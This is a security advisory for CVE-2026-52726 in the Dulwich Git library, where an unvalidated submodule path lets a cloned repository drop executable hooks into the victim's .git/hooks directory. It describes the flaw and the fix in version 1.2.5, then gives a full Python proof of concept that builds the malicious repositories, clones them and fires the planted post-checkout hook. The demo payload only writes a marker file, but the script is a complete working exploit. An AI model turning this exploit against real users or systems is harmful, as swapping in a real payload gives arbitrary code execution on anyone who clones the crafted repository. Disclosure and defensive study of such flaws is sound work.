CVE-2026-52726

An attacker crafts an upstream repository containing a malicious `.gitmodules` file and a matching tree gitlink. This gitlink's `path` is set to `.git/hooks` or another directory within the parent repository's `.git` directory. When a victim clones this repository with `recurse_submodules=True`, the attacker's submodule contents are written directly into the victim's `.git/hooks/` directory, preserving executable permissions [ref_id=1]. Subsequent Git or Dulwich commands that invoke these hooks lead to arbitrary code execution [ref_id=1].

The vulnerability resides in `dulwich.porcelain.submodule_update` and `dulwich.porcelain.clone` when `recurse_submodules=True`. Specifically, the code in `dulwich/porcelain/submodule.py` consumes the submodule path from a tree gitlink entry without adequate validation. This path is then used in `os.path.join` and passed to `build_index_from_tree` without a strict path validator, allowing malicious paths to be written [ref_id=1].

Version 1.2.5 addresses the vulnerability by implementing path validation before materializing submodule contents. This prevents attacker-controlled paths, such as `.git/hooks`, from being written into sensitive locations within the `.git` directory. The fix ensures that only safe paths are processed, mitigating the risk of arbitrary code execution through malicious submodule configurations [ref_id=1].

import os, tempfile, subprocess import dulwich.repo as r import dulwich.porcelain as p from dulwich.objects import Blob, Commit, Tree

WORKDIR = tempfile.mkdtemp(prefix="dulwich-poc-") ATTACKER = os.path.join(WORKDIR, "att.git") VICTIM_PARENT = os.path.join(WORKDIR, "vic_parent.git") VICTIM_WT = os.path.join(WORKDIR, "vic_wt") MARKER = os.path.join(WORKDIR, "marker")

# Attacker submodule contains a single file named "post-checkout" # with mode 0755 and a benign shell payload that writes a marker file. attacker = r.Repo.init_bare(ATTACKER, mkdir=True) payload = b"#!/bin/sh\necho executed > " + MARKER.encode() + b"\n" pb = Blob.from_string(payload) attacker.object_store.add_object(pb) at = Tree() at.add(b"post-checkout", 0o100755, pb.id) attacker.object_store.add_object(at) ac = Commit() ac.tree = at.id ac.author = ac.committer = b"a <a@a>" ac.author_time = ac.commit_time = 0 ac.author_timezone = ac.commit_timezone = 0 ac.message = b"x" attacker.object_store.add_object(ac) attacker.refs[b"refs/heads/master"] = ac.id attacker.refs.set_symbolic_ref(b"HEAD", b"refs/heads/master")

# Victim parent has a .gitmodules and a tree gitlink, both pointing at # path ".git/hooks". The gitlink targets the attacker submodule commit. victim = r.Repo.init_bare(VICTIM_PARENT, mkdir=True) gitmod = ( b'[submodule "evil"]\n' b'\tpath = .git/hooks\n' b'\turl = ' + ATTACKER.encode() + b'\n' ) gmb = Blob.from_string(gitmod) victim.object_store.add_object(gmb) vt = Tree() vt.add(b".gitmodules", 0o100644, gmb.id) vt.add(b".git/hooks", 0o160000, ac.id) victim.object_store.add_object(vt) vc = Commit() vc.tree = vt.id vc.author = vc.committer = b"a <a@a>" vc.author_time = vc.commit_time = 0 vc.author_timezone = vc.commit_timezone = 0 vc.message = b"v" victim.object_store.add_object(vc) victim.refs[b"refs/heads/master"] = vc.id victim.refs.set_symbolic_ref(b"HEAD", b"refs/heads/master")

# Single victim call: clone with recurse_submodules=True p.clone(VICTIM_PARENT, VICTIM_WT, recurse_submodules=True)

hook = os.path.join(VICTIM_WT, ".git", "hooks", "post-checkout") assert os.path.exists(hook), "hook was not written" assert os.stat(hook).st_mode & 0o111, "hook is not executable"

# git running in the victim worktree then executes the dropped hook subprocess.run(["git", "-C", VICTIM_WT, "checkout", "master"], check=True, capture_output=True) assert os.path.exists(MARKER), "hook did not fire" print("Code execution confirmed:", open(MARKER).read().strip())